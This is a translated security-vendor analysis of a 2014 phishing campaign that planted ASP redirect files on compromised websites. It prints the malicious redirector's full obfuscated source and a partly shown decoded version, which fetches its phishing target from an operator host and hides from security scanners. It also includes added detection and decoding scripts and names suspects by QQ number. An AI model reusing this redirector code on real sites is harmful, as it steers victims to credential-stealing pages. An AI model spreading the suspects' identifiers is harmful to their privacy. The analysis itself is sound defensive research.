Analysis Report on the "Ma Ye" (马爷) Phishing Campaign

2014-01-20, Knownsec (知道创宇) Website Security Center

I. Background

Phishing: an attacker sends deceptive messages to Internet users in order to lure them into handing over sensitive information (for example QQ account credentials, bank card details, or credentials for online payment platforms).

Online fraud, phishing, rogue base stations, black-hat SEO and the underground economy behind them have remained rampant in recent years. This article uses one phishing case to expose what goes on behind that underground supply chain.

Around September 2013, Tencent PC Manager detected a batch of websites carrying planted pages that redirect to phishing sites. Many of these sites had been compromised and had malicious files uploaded to the web root; the file names were roughly of four kinds: _sys.asp, bas.asp, pro.asp and dawn.asp.

An example link to a planted file: http://gnxwhg.com/pro.asp?&jcjlz9pzd0y&te

Visiting it redirects to a phishing site:

  1. http://zohqdt.eicp.net:2/27/
  2. http://qkepisav.vicp.cc:2/27/

When we visited the same compromised link the next day, it redirected to a different phishing page. Interesting.


II. Statistics on the compromised websites

First we grouped the compromised websites by IP range:

[Chart: IP range statistics]

Four of the hosts have adjacent IPs, 112.121.176.67-70, and between them account for 10 of the compromised websites.

We then looked at the web server software running on the compromised hosts; the results were:

  • Microsoft IIS/6.0                27
  • Other Microsoft IIS versions     13
  • Other                             9

The chart shows clearly that servers running IIS make up 82% of the sample, and IIS/6.0 alone accounts for 55%.

Next we fingerprinted the web applications running on the compromised sites:

WordPress, EmpireCMS (帝国CMS), DedeCMS and Jingliang Nanfang (精良南方) made up the largest shares; the rest was a mixed bag of all sorts of applications.

Why do this statistical analysis? To rule out the possibility that the attackers used a 0day.

Our inference is therefore that the phishing group most likely bought large numbers of webshells (control of compromised websites) cheaply, saving themselves the time of breaking into websites to upload the redirect pages.

Based on the points above, the rough workflow is easy to picture:

  1. Buy webshells cheaply and in bulk
  2. Upload the malicious phishing-redirect files, manually or with automation
  3. Sell the personal data harvested from the phishing victims on the underground market


III. What a site planted with the phishing redirect looks like

The malicious redirect files are named:

  1. _sys.asp
  2. pro.asp
  3. dawn.asp
  4. bas.asp

When we request any of these files on its own, the page returns nothing but the digit 0, as shown in the figure.

The phishers instead generate links such as: http://luyuanwine.com/_sys.asp?&jcv.ix&s&

Visiting such a link automatically redirects to the phishing page. The part after _sys.asp? is a pseudo-random string generated by the attackers; they use the compromised website to bounce the visitor on to the phishing site and carry out the attack there.

A compromised website hosting the redirect page will be flagged by services such as the Security Alliance (安全联盟) for hosting a malicious page, which leads to search-engine ranking penalties and browser security warnings when visitors open the site.


IV. The details behind the redirect

As mentioned earlier, when we visited the planted link on the second day the redirect target had changed, which struck us as odd. Let us look at the two redirect targets we saved earlier:

  1. http://zohqdt.eicp.net:2/27/
  2. http://qkepisav.vicp.cc:2/27/

The phishing group is indeed crafty: both are free dynamic second-level domains. Using a free sub-domain provider's hostnames for the redirect hop has one big advantage for the attacker: it makes any later investigation considerably harder.

We obtained samples of the redirect files and found that _sys.asp, dawn.asp, pro.asp and bas.asp share identical source code; only the file names differ. The sample itself is interesting: it is both padded with junk and encoded:

Full ASP source of the redirect page:

[1: http://blog.knownsec.com/wp-content/uploads/2014/01/Phishing_source_encode.txt]

Every variable name in the code has been scrambled into junk to confuse webmasters and anyone analysing the file.
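A webmaster triaging a web root can turn the traits visible in this sample into a scoring check. The following is an added example, not code from the Knownsec write-up or from the sample: it scores ASP files on the four dropped file names, identifiers made only of E and _, integer constants hidden behind arithmetic such as (85 * 58 - 4929), the VBSCRIPT.ENCODE directive, and a remote fetch feeding Response.Redirect. The weights and threshold are assumptions, and the two inline files are constructed (the first stitches together lines from the page's sample).

```python
import re
from dataclasses import dataclass, field

# File names the analysis saw dropped into compromised web roots.
DROPPED_NAMES = {"_sys.asp", "pro.asp", "dawn.asp", "bas.asp"}

# Content indicators lifted from the sample; weights below are assumptions.
RE_JUNK_IDENT = re.compile(r"\b[E_]{6,7}\b")                           # E_E___E, EE__E_
RE_FOLDED_CONST = re.compile(r"\(\s*\d+\s*\*\s*\d+\s*-\s*\d+\s*\)")    # (85 * 58 - 4929)
RE_ENCODE = re.compile(r"LANGUAGE\s*=\s*VBSCRIPT\.ENCODE", re.I)
RE_FETCH = re.compile(r"Microsoft\.XMLHTTP", re.I)
RE_REDIRECT = re.compile(r"Response\.Redirect", re.I)


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)


def score_asp(name: str, content: str) -> Verdict:
    """Score one ASP file; a higher score means closer to the redirector sample."""
    v = Verdict()
    if name.lower() in DROPPED_NAMES:
        v.score += 2
        v.reasons.append("known dropped file name")
    idents = set(RE_JUNK_IDENT.findall(content))
    if len(idents) >= 10:
        v.score += 3
        v.reasons.append(f"{len(idents)} distinct E/_-only identifiers")
    folded = len(RE_FOLDED_CONST.findall(content))
    if folded >= 3:
        v.score += 2
        v.reasons.append(f"{folded} arithmetic-folded constants")
    if RE_ENCODE.search(content):
        v.score += 1
        v.reasons.append("VBSCRIPT.ENCODE directive")
    if RE_FETCH.search(content) and RE_REDIRECT.search(content):
        v.score += 2
        v.reasons.append("remote fetch feeding Response.Redirect")
    return v


def is_suspicious(name: str, content: str, threshold: int = 5) -> bool:
    return score_asp(name, content).score >= threshold


# Constructed inputs: lines taken from the page's sample, and a plain page.
MALICIOUS = """<%@ LANGUAGE = VBSCRIPT.ENCODE%>
<%
Dim E_E__E,E_E_E_,E_E_EE,E_EE__,E_EE_E
Set EEE__EE=Server.CreateObject("Microsoft.XMLHTTP")
EE___EE.Type = (85 * 58 - 4929)
EE___EE.Mode = (71 * 34 - 2411)
E__EEE_= (82 * 53 - 4247)* Rnd
E__EEEE=Trim(E_E_E_.QueryString())
E__EEEE=(EE___E(E__EEEE))
Response.Redirect E_E___E&E__EEEE
%>"""
BENIGN = """<% Dim name: name = Request.QueryString("name")
Response.Write Server.HTMLEncode(name) %>"""
```

Run it over every .asp file under the web root and review anything at or above the threshold by hand; the reasons list says which indicators fired.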

After a long decoding effort we recovered the original source:

[2: http://blog.knownsec.com/wp-content/uploads/2014/01/Phishing_source_decode.txt]

The source file does the following:

  1. Checks the request for SQL injection keywords
  2. Checks whether the "channel" (http://mayeav.com:2/xx.txt) is reachable
  3. Reads the URL held in the channel file and redirects to it
  4. Generates a random Title

The question of why it redirects to a changing domain is now easy to answer. Look at line 46 of the code:

Response.Write "http://" &Request.ServerVariables("HTTP_HOST")&"  [通道正常 " &EE__E_("http://mayeav.com:2/xx.txt")&"]")

The code checks whether the channel http://mayeav.com:2/xx.txt can be reached; line 58 then reads the contents of xx.txt and issues the redirect. The whole process is one redirect after another:

Compromised website -> fetch the URL from the channel -> redirect to the second-level-domain phishing site -> real domain
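For incident response it is useful to map an observed request back to the phishing-kit directory it points at, which means replaying what the sample does to the query string before the redirect. The following Python is an added example, not code from the write-up or from the sample: it re-implements the sample's custom base64 decoder (EE___E) and the substitutions made in the routine the analysts named jump_fishsite_fun, then feeds it the two planted links quoted on this page. The function names are my own.

```python
# Alphabet of the sample's lookup table EE_E_E_ (the standard base64 alphabet).
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
INDEX = {c: i for i, c in enumerate(ALPHABET)}


def sample_b64decode(text: str) -> bytes:
    """Re-implementation of the sample's decoder EE___E.

    Trailing '=' is stripped, whole 4-char groups are decoded, then a 2- or
    3-char tail is handled; a single leftover char is silently dropped.  A
    char outside the alphabet decodes as 0, because the sample's table holds
    Empty at that index.
    """
    text = text.rstrip("=")
    n = len(text)
    val = [INDEX.get(c, 0) for c in text]
    out = bytearray()
    i = 0
    while i + 4 <= n:
        a, b, c, d = val[i:i + 4]
        out.append(((a * 4) & 255) + ((b // 16) & 3))
        out.append(((b * 16) & 255) + ((c // 4) & 15))
        out.append(((c * 64) & 255) + (d & 63))
        i += 4
    if i < n - 1:                       # two or three chars remain
        a, b = val[i], val[i + 1]
        out.append(((a * 4) & 255) + ((b // 16) & 3))
        if n % 4 == 3:
            c = val[i + 2]
            out.append(((b * 16) & 255) + ((c // 4) & 15))
    return bytes(out)


def recover_redirect_path(raw_query: str) -> bytes:
    """What the sample appends to the URL it read from xx.txt.

    The raw query string has '%', '@' and '&' turned into 'M', '.' expanded
    to 'P2lkPT' (the base64 prefix of '?id=' plus a following byte in
    0x30..0x3F, such as a digit), is decoded, and any '#' is removed.
    """
    s = raw_query.strip()
    for ch in "%@&":
        s = s.replace(ch, "M")
    s = s.replace(".", "P2lkPT")
    return sample_b64decode(s).replace(b"#", b"")


def phishing_directory(raw_query: str) -> str:
    """Leading digits of the decoded path: the kit directory (01 .. 29)."""
    digits = ""
    for b in recover_redirect_path(raw_query):
        if 0x30 <= b <= 0x39:
            digits += chr(b)
        else:
            break
    return digits


# Query strings of the two planted links quoted on this page.
OBSERVED = ["&jcv.ix&s&", "&jcjlz9pzd0y&te"]

if __name__ == "__main__":
    for q in OBSERVED:
        print(repr(q), "->", recover_redirect_path(q), "dir", phishing_directory(q))
```

Both quoted links decode to directory 27, matching the /27/ path of the redirect targets recorded above; the trailing bytes after the directory are not printable and are left as the decoder produces them.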

 

V. Tracking down the source of the phishing

As everyone expects, it is time to investigate where the phishing comes from :)

From the sample analysis stage we already had the most valuable piece of information, the phishing operators' real domain: http://mayeav.com:2/

From there we naturally obtained the path of the back-end:

The phishing site's administration back-end is labelled: 【V 2013】马爷工作室后台系统 (Ma Ye Studio back-end system)

mayeav.com:2/01/

mayeav.com:2/02/

mayeav.com:2/…/

mayeav.com:2/29/

Enumerating directories 01 through 29 turns up one phishing site after another. Directory layout of a phishing site:

/admin/# administrator back-end

/images/# Pic

/Images/jdmk/

/27/index_files/ff45cc10.jpg

/27/include/

/20/vget_i.js

From the registrant information of mayeav.com we obtained Ma Ye's QQ number: 1872395818

Reverse lookups on the same registrant also turned up many private-game-server (私服) domains, all of which redirect to Ma Ye's phishing sites, so we infer that whoever registered those domains either knows Ma Ye or is the same person.

In the time it takes to drink a cup of tea, the private-server domains led us to the following record:

Contact: 小往 (Xiao Wang)

Phone: 13618***453

Location: Wuhan, Hubei

E-mail: 48**62@qq.com

We designate the person behind this record as phishing group member [A]. Next we obtained the QQ number of a friend of member [A]: searching for 48**62 turned up a forum post containing a URL, and the same private-server domains are registered to that person as well (member [B]).

The full list:

Ma Ye QQ: 1872395818

Group member [A] QQ: 48**62

Group member [B] QQ: 505***850

Using a fabricated identity we got in touch with member [A]; lengthy conversations confirmed that member [B] and Ma Ye are both known to him, so we can reasonably conclude that all three are organisers of the phishing operation.

Finally, we had to look inside the back-end to see just how big this phishing operation is.

The back-end management is divided into e-mail templates and hosting-space templates, with every phishing page as a separate module; after some simple configuration the attacker can send it out to Internet users. Judging by the scale of the back-end, the QQ accounts and other personal data they have stolen already exceed ten thousand records.

Our advice to all Internet users: "Before logging in to a website, check carefully that the address is the genuine one, to avoid unnecessary losses!"


[1] http://blog.knownsec.com/wp-content/uploads/2014/01/Phishing_source_encode.txt  source code before decoding

[2] http://blog.knownsec.com/wp-content/uploads/2014/01/Phishing_source_decode.txt  source code with comments added after analysis

Code before decoding:

<%@ LANGUAGE = VBSCRIPT.ENCODE%>
<%
Dim E_E__E,E_E_E_,E_E_EE,E_EE__,E_EE_E
Set E_E_EE=Response:Set E_E_E_=Request:Set E_EE_E=Session:Set E_E__E=Application:Set E_EE__=Server
Dim EEE_E_,EEE_EE,EEEE__,EEEE_E,EEEEE_,EEEEEE

EEEE_E ="*|'|;|and|or|count|char|delete|declare|exec|insert|select|update|truncate|mid|master"
EEEEE_ = Split(EEEE_E,"|")
If Request.QueryString<>"" Then
For Each EEE_E_ In Request.QueryString
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.QueryString(EEE_E_)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
If Request.Form<>"" Then
For Each EEE_EE In Request.Form
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.Form(EEE_EE)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
If Request.Cookies<>"" Then
For Each EEEE__ In Request.Cookies
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.Cookies(EEEE__)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
if  EE_E__(Trim(Request.QueryString()))<1 then
Response.Write EE_E__(Trim(Request.QueryString()))
Response.End()
end if

if Trim(Request.QueryString())="ok" then

Response.Write "http://" &Request.ServerVariables("HTTP_HOST")&"  [通道正常 " &EE__E_("http://mayeav.com:2/xx.txt")&"]")
EE_EE_()
Response.End()
end if
Const EE_E__E ="222.202.*.*|220.249.*.*|219.232.*.*|219.223.*.*|219.134.*.*|219.133.*.*|218.18.*.*|211.148.*.*|211.96.*.*|210.21.*.*|203.86.*.*|202.105.*.*|202.96.*.*|202.104.*.*|202.103.*.*|61.144.*.*|61.141.*.*|59.40.*.*|58.60.*.*"
If E_EEE_(EE_E__E) = True Then

Response.Write("Bad Request (Invalid URL.)")
Response.End()
End If
Dim Str

Str = EE__E_("http://mayeav.com:2/xx.txt")
const EE_E_E_ ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
dim E_____E
dim E____E_(63)
dim E____EE(127)
sub EEE___
E_E___E=Str
randomize
E__EEE_= (82 * 53 - 4247)* Rnd

E_E___E="http://"+E_E___E
call EEE__E
E__EEEE=Trim(E_E_E_.QueryString())

E__EEEE= Replace(E__EEEE,"%","M")
E__EEEE= Replace(E__EEEE,"@","M")
E__EEEE= Replace(E__EEEE,"&","M")
E__EEEE= Replace(E__EEEE,".","P2lkPT")
E__EEEE=(EE___E(E__EEEE))

E__EEEE= Replace(E__EEEE,"#","")
Response.Redirect E_E___E&E__EEEE
end sub
Function E_EEE_(EEEE__E)
Dim E___E__, E___E_E, E___EE_, E___EEE, E__E___, E__E__E

E___EE_ = Split(EEEE__E, "|")
E___E_E = Split(E_EEEE(), ".")
For E__E___ = 0 To UBound(E___EE_)
E___E__ = (14 * 29 - 406)
E___EEE = Split(E___EE_(E__E___), ".")
For E__E__E = 0 To UBound(E___E_E)
If(E___EEE(E__E__E)) = "*" or Cstr(E___E_E(E__E__E)) = Cstr(E___EEE(E__E__E)) Then
E___E__ = E___E__ + (85 * 58 - 4929)
End If
Next
If E___E__ = 4 Then
E_EEE_ = True
Exit Function
End If
Next
E_EEE_ = False
End Function
Function E_EEEE()
Dim E__E_E_
E__E_E_ = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If E__E_E_ = "" Then E__E_E_ = Request.ServerVariables("REMOTE_ADDR")
E_EEEE = E__E_E_
End Function
Dim E__E_EE, E__EE__, E__EE_E,E__EEE_,E__EEEE,E_E____,E_E___E,E_E__E_
Dim E_E__EE
E_E__EE = Request.ServerVariables("HTTP_USER_AGENT")
E_E__EE = Lcase(E_E__EE)
Dim E_E_E__,E_E_E_E,E_E_EE_,E_E_EEE

EE_E_EE ="linux;"
EE_EE__="applewebkit"
EE_EE_E="0)"
EE_EEE_="msie 10.0"
EE_EEEE="msie 9.0"
EEE____="msie 8.0"
EEE___E="msie 7.0"
EEE__E_="msie 6.0"
if Instr(E_E__EE, EE_E_EE) <> 0 then
call EEE___
end if
if Instr(E_E__EE, EE_EE__) <> 0 then
call EEE___
end if
if Instr(E_E__EE, EE_EE_E) <> 0 or Instr(E_E__EE, EEE__E_) <> 0 or Instr(E_E__EE, EEE___E) <> 0 or Instr(E_E__EE, EEE____) <> 0 or Instr(E_E__EE, EE_EEEE) <> 0  or Instr(E_E__EE, EE_EEE_) <> 0 then
call EEE___
end if
PUBLIC SUB EEE__E()

E_____E ="<P>" & chr(13) & chr(10)
dim E_EE___, E_EE__E
E_EE___ = len(EE_E_E_)
for E_EE__E = 0 to E_EE___ - (85 * 58 - 4929)
E____E_(E_EE__E) = mid(EE_E_E_, E_EE__E + 1, 1)
next
for E_EE__E = 0 to E_EE___ - (85 * 58 - 4929)
E____EE(ASC(E____E_(E_EE__E))) = E_EE__E
next
END SUB
PUBLIC FUNCTION EE____(EEEE_E_)
if len(EEEE_E_) = 0 then
EE____ = ""
exit function
end if
dim E_EE_E_, E_EE_EE, E_EEE__, E_EEE_E, second, E_EEEEE
E_EEE__ = (len(EEEE_E_) \ 3) * (71 * 34 - 2411)
E_EE_EE = (85 * 58 - 4929)
do while E_EE_EE <= E_EEE__
E_EEE_E = asc(mid(EEEE_E_, E_EE_EE+0, 1))
second = asc(mid(EEEE_E_, E_EE_EE+1, 1))
E_EEEEE = asc(mid(EEEE_E_, E_EE_EE+2, 1))
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E \ 4) AND 63 )
E_EE_E_ = E_EE_E_ & E____E_( ((E_EEE_E * 16) AND 48) + ((second \ 16) AND 15 ) )
E_EE_E_ = E_EE_E_ & E____E_( ((second * 4) AND 60) + ((E_EEEEE \ 64) AND 3 ) )
E_EE_E_ = E_EE_E_ & E____E_( E_EEEEE AND 63)
E_EE_EE = E_EE_EE + (71 * 34 - 2411)
loop
if E_EEE__ < len(EEEE_E_) then
E_EEE_E = asc(mid(EEEE_E_, E_EE_EE+0, 1))
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E \ 4) AND 63 )
if (len(EEEE_E_) MOD 3 ) = 2 then
second = asc(mid(EEEE_E_, E_EE_EE+1, 1))
E_EE_E_ = E_EE_E_ & E____E_( ((E_EEE_E * 16) AND 48) + ((second \ 16) AND 15 ) )
E_EE_E_ = E_EE_E_ & E____E_( ((second * 4) AND 60) )
else
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E * 16) AND 48)
E_EE_E_ = E_EE_E_
end if
E_EE_E_ = E_EE_E_
end if
EE____ = E_EE_E_
END FUNCTION
PUBLIC FUNCTION EE___E(EEEE_EE)
if len(EEEE_EE) = 0 then
EE___E = ""
exit function
end if
dim EE_____
EE_____ = len(EEEE_EE)
do while mid(EEEE_EE, EE_____, 1) ="="
EE_____ = EE_____ - (85 * 58 - 4929)
loop
dim E_EE_E_, E_EE_EE, EE____E, E_EEE_E, second, E_EEEEE, EE___E_
E_EE_E_ = ""
EE____E = (EE_____ \ 4) * (100 * 107 - 10696)
E_EE_EE = (85 * 58 - 4929)
do while E_EE_EE <= EE____E
E_EEE_E = E____EE(asc(mid(EEEE_EE, E_EE_EE+0, 1)))
second = E____EE(asc(mid(EEEE_EE, E_EE_EE+1, 1)))
E_EEEEE = E____EE(asc(mid(EEEE_EE, E_EE_EE+2, 1)))
EE___E_ = E____EE(asc(mid(EEEE_EE, E_EE_EE+3, 1)))
E_EE_E_ = E_EE_E_ & chr( ((E_EEE_E * 4) AND 255) + ((second \ 16) AND 3))
E_EE_E_ = E_EE_E_ & chr( ((second * 16) AND 255) + ((E_EEEEE \ 4) AND 15))
E_EE_E_ = E_EE_E_ & chr( ((E_EEEEE * 64) AND 255) + (EE___E_ AND 63))
E_EE_EE = E_EE_EE + (100 * 107 - 10696)
loop
if E_EE_EE < EE_____ then
E_EEE_E = E____EE(asc(mid(EEEE_EE, E_EE_EE+0, 1)))
second = E____EE(asc(mid(EEEE_EE, E_EE_EE+1, 1)))
E_EE_E_ = E_EE_E_ & chr( ((E_EEE_E * 4) AND 255) + ((second \ 16) AND 3))
if EE_____ MOD 4 = 3 then
E_EEEEE = E____EE(asc(mid(EEEE_EE,E_EE_EE+2,1)))
E_EE_E_ = E_EE_E_ & chr( ((second * 16) AND 255) + ((E_EEEEE \ 4) AND 15))
end if
end if
EE___E=E_EE_E_
END FUNCTION
Function EE__E_(EEEEE__)
Set EEE__EE=Server.CreateObject("Microsoft.XMLHTTP")
On Error Resume Next
EEE__EE.Open GET,EEEEE__,False
EEE__EE.send()
if Err then
Err.Clear
Response.Write("#Bad Request (Invalid URL)")
Response.End()
End if
EEE_E__=EE__EE(EEE__EE.responseBody,gb2312)
set EEE__EE=nothing
EE__E_=EEE_E__
End Function
Function EE__EE(EEEEE_E,EEEEEE_)
Dim EE___EE
Set EE___EE = Server.CreateObject("adodb.stream")
EE___EE.Type = (85 * 58 - 4929)
EE___EE.Mode = (71 * 34 - 2411)
EE___EE.Open
EE___EE.Write EEEEE_E
EE___EE.Position = (14 * 29 - 406)
EE___EE.Type = (14 * 102 - 1426)
EE___EE.Charset = EEEEEE_
EE__EE = EE___EE.ReadText
EE___EE.Close
set EE___EE = nothing
End Function
function EE_E__(str)
if isnull(str) or str = "" then
EE_E__ = (14 * 29 - 406)
else
dim E__E___, EE__E__, EE__E_E, EE__EE_
EE__E_E = (14 * 29 - 406)
EE__E__ = len(str)
for E__E___ = 1 to EE__E__
EE__EE_ = mid(str, E__E___, 1)
if asc(EE__EE_) >= 0 and asc(EE__EE_) <= 255 then
EE__E_E = EE__E_E + (85 * 58 - 4929)
else
EE__E_E = EE__E_E + (14 * 102 - 1426)
end if
next
EE_E__ = EE__E_E
end if
end function
Function EE_E_E(EEEEEEE)
On Error Resume Next
EE_E_E = False
Err = (14 * 29 - 406)
Dim EE__EEE
Set EE__EEE = Server.CreateObject(EEEEEEE)
If 0 = Err Then EE_E_E = True
Set EE__EEE = Nothing
Err = (14 * 29 - 406)
End Function
Function EE_EE_()
EEE_E_E = Server.mappath(Request.ServerVariables("SCRIPT_NAME"))
If EE_E_E("Scripting.FileSystemObject") = False Then
Else
Set EEE_EE_ = Server.CreateObject("Scripting.FileSystemObject")
EEE_EEE = EEE_EE_.getFile(EEE_E_E).Attributes
if EEE_EEE = 32 or EEE_EEE = 1 or EEE_EEE = 2 then
EEE_EE_.getFile(EEE_E_E).Attributes = (98 * 32 - 1081)
end if
End If
End Function
Function EE_EEE(ByVal EEEE___)
Dim EE_E___, E__E___, EE__E__
EEEE___ = Replace(EEEE___, Chr(37) & ChrW(-243) & Chr(62), Chr(37) & Chr(62))
For E__E___ = 1 To Len(EEEE___)
If E__E___ <> EE__E__ Then
EE_E___ = AscW(Mid(EEEE___, E__E___, 1))
If EE_E___ >= 33 And EE_E___ <= 79 Then
EE_EEE = EE_EEE & Chr(EE_E___ + 47)
ElseIf EE_E___ >= 80 And EE_E___ <= 126 Then
EE_EEE = EE_EEE & Chr(EE_E___ - 47)
Else
EE__E__ = E__E___ + 1
If Mid(EEEE___, EE__E__, 1) = EE_EEE("o") Then EE_EEE = EE_EEE & ChrW(EE_E___ + 5) Else EE_EEE = EE_EEE & Mid(EEEE___, E__E___, 1)
End If
End If
Next
End Function
%>

Source code with comments added after analysis:

<%@ LANGUAGE = VBSCRIPT.ENCODE%>
<%
Dim E_E__E,E_E_E_,E_E_EE,E_EE__,E_EE_E
Set E_E_EE=Response:Set E_E_E_=Request:Set E_EE_E=Session:Set E_E__E=Application:Set E_EE__=Server
Dim EEE_E_,EEE_EE,EEEE__,EEEE_E,EEEEE_,EEEEEE


'===================================================================================================================================
'Filter SQL injection
EEEE_E ="*|'|;|and|or|count|char|delete|declare|exec|insert|select|update|truncate|mid|master"
EEEEE_ = Split(EEEE_E,"|")
If Request.QueryString<>"" Then
For Each EEE_E_ In Request.QueryString
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.QueryString(EEE_E_)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
If Request.Form<>"" Then
For Each EEE_EE In Request.Form
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.Form(EEE_EE)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
If Request.Cookies<>"" Then
For Each EEEE__ In Request.Cookies
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.Cookies(EEEE__)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
if  EE_E__(Trim(Request.QueryString()))<1 then
Response.Write EE_E__(Trim(Request.QueryString()))
Response.End()
end if


'===================================================================================================================================
'Check whether the phishing site has been updated and fetch the new site to call
if Trim(Request.QueryString())="ok" then

Response.Write "http://" &Request.ServerVariables("HTTP_HOST")&"  [通道正常 " &xml_request_fun("http://mayeav.com:2/xx.txt")&"]")
EE_EE_()
Response.End()
end if
Const EE_E__E ="222.202.*.*|220.249.*.*|219.232.*.*|219.223.*.*|219.134.*.*|219.133.*.*|218.18.*.*|211.148.*.*|211.96.*.*|210.21.*.*|203.86.*.*|202.105.*.*|202.96.*.*|202.104.*.*|202.103.*.*|61.144.*.*|61.141.*.*|59.40.*.*|58.60.*.*"
If E_EEE_(EE_E__E) = True Then

Response.Write("Bad Request (Invalid URL.)")
Response.End()
End If
Dim Str

Str = xml_request_fun("http://mayeav.com:2/xx.txt")
const EE_E_E_ ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
dim E_____E
dim E____E_(63)
dim E____EE(127)

'===================================================================================================================================
'Redirect to the phishing site
sub jump_fishsite_fun
E_E___E=Str
randomize
E__EEE_= (82 * 53 - 4247)* Rnd

E_E___E="http://"+E_E___E
call EEE__E
E__EEEE=Trim(E_E_E_.QueryString())

E__EEEE= Replace(E__EEEE,"%","M")
E__EEEE= Replace(E__EEEE,"@","M")
E__EEEE= Replace(E__EEEE,"&","M")
E__EEEE= Replace(E__EEEE,".","P2lkPT")
E__EEEE=(EE___E(E__EEEE))

E__EEEE= Replace(E__EEEE,"#","")
Response.Redirect E_E___E&E__EEEE
end sub

Function E_EEE_(EEEE__E)
Dim E___E__, E___E_E, E___EE_, E___EEE, E__E___, E__E__E

E___EE_ = Split(EEEE__E, "|")
E___E_E = Split(get_client_ip_fun(), ".")
For E__E___ = 0 To UBound(E___EE_)
E___E__ = (14 * 29 - 406)
E___EEE = Split(E___EE_(E__E___), ".")
For E__E__E = 0 To UBound(E___E_E)
If(E___EEE(E__E__E)) = "*" or Cstr(E___E_E(E__E__E)) = Cstr(E___EEE(E__E__E)) Then
E___E__ = E___E__ + (85 * 58 - 4929)
End If
Next
If E___E__ = 4 Then
E_EEE_ = True
Exit Function
End If
Next
E_EEE_ = False
End Function

'===================================================================================================================================
'Get the client IP
Function get_client_ip_fun()
Dim E__E_E_
E__E_E_ = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If E__E_E_ = "" Then E__E_E_ = Request.ServerVariables("REMOTE_ADDR")
get_client_ip_fun = E__E_E_
End Function

Dim E__E_EE, E__EE__, E__EE_E,E__EEE_,E__EEEE,E_E____,E_E___E,E_E__E_
Dim E_E__EE
E_E__EE = Request.ServerVariables("HTTP_USER_AGENT")
E_E__EE = Lcase(E_E__EE)
Dim E_E_E__,E_E_E_E,E_E_EE_,E_E_EEE

EE_E_EE ="linux;"
EE_EE__="applewebkit"
EE_EE_E="0)"
EE_EEE_="msie 10.0"
EE_EEEE="msie 9.0"
EEE____="msie 8.0"
EEE___E="msie 7.0"
Exml_request_fun="msie 6.0"
if Instr(E_E__EE, EE_E_EE) <> 0 then
call jump_fishsite_fun
end if
if Instr(E_E__EE, EE_EE__) <> 0 then
call jump_fishsite_fun
end if
if Instr(E_E__EE, EE_EE_E) <> 0 or Instr(E_E__EE, Exml_request_fun) <> 0 or Instr(E_E__EE, EEE___E) <> 0 or Instr(E_E__EE, EEE____) <> 0 or Instr(E_E__EE, EE_EEEE) <> 0  or Instr(E_E__EE, EE_EEE_) <> 0 then
call jump_fishsite_fun
end if


PUBLIC SUB EEE__E()
E_____E ="<P>" & chr(13) & chr(10)
dim E_EE___, E_EE__E
E_EE___ = len(EE_E_E_)
for E_EE__E = 0 to E_EE___ - (85 * 58 - 4929)
E____E_(E_EE__E) = mid(EE_E_E_, E_EE__E + 1, 1)
next
for E_EE__E = 0 to E_EE___ - (85 * 58 - 4929)
E____EE(ASC(E____E_(E_EE__E))) = E_EE__E
next
END SUB


PUBLIC FUNCTION EE____(EEEE_E_)
if len(EEEE_E_) = 0 then
EE____ = ""
exit function
end if
dim E_EE_E_, E_EE_EE, E_EEE__, E_EEE_E, second, E_EEEEE
E_EEE__ = (len(EEEE_E_) \ 3) * (71 * 34 - 2411)
E_EE_EE = (85 * 58 - 4929)
do while E_EE_EE <= E_EEE__
E_EEE_E = asc(mid(EEEE_E_, E_EE_EE+0, 1))
second = asc(mid(EEEE_E_, E_EE_EE+1, 1))
E_EEEEE = asc(mid(EEEE_E_, E_EE_EE+2, 1))
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E \ 4) AND 63 )
E_EE_E_ = E_EE_E_ & E____E_( ((E_EEE_E * 16) AND 48) + ((second \ 16) AND 15 ) )
E_EE_E_ = E_EE_E_ & E____E_( ((second * 4) AND 60) + ((E_EEEEE \ 64) AND 3 ) )
E_EE_E_ = E_EE_E_ & E____E_( E_EEEEE AND 63)
E_EE_EE = E_EE_EE + (71 * 34 - 2411)
loop
if E_EEE__ < len(EEEE_E_) then
E_EEE_E = asc(mid(EEEE_E_, E_EE_EE+0, 1))
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E \ 4) AND 63 )
if (len(EEEE_E_) MOD 3 ) = 2 then
second = asc(mid(EEEE_E_, E_EE_EE+1, 1))
E_EE_E_ = E_EE_E_ & E____E_( ((E_EEE_E * 16) AND 48) + ((second \ 16) AND 15 ) )
E_EE_E_ = E_EE_E_ & E____E_( ((second * 4) AND 60) )
else
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E * 16) AND 48)
E_EE_E_ = E_EE_E_
end if
E_EE_E_ = E_EE_E_
end if
EE____ = E_EE_E_
END FUNCTION


PUBLIC FUNCTION EE___E(EEEE_EE)
if len(EEEE_EE) = 0 then
EE___E = ""
exit function
end if
dim EE_____
EE_____ = len(EEEE_EE)
do while mid(EEEE_EE, EE_____, 1) ="="
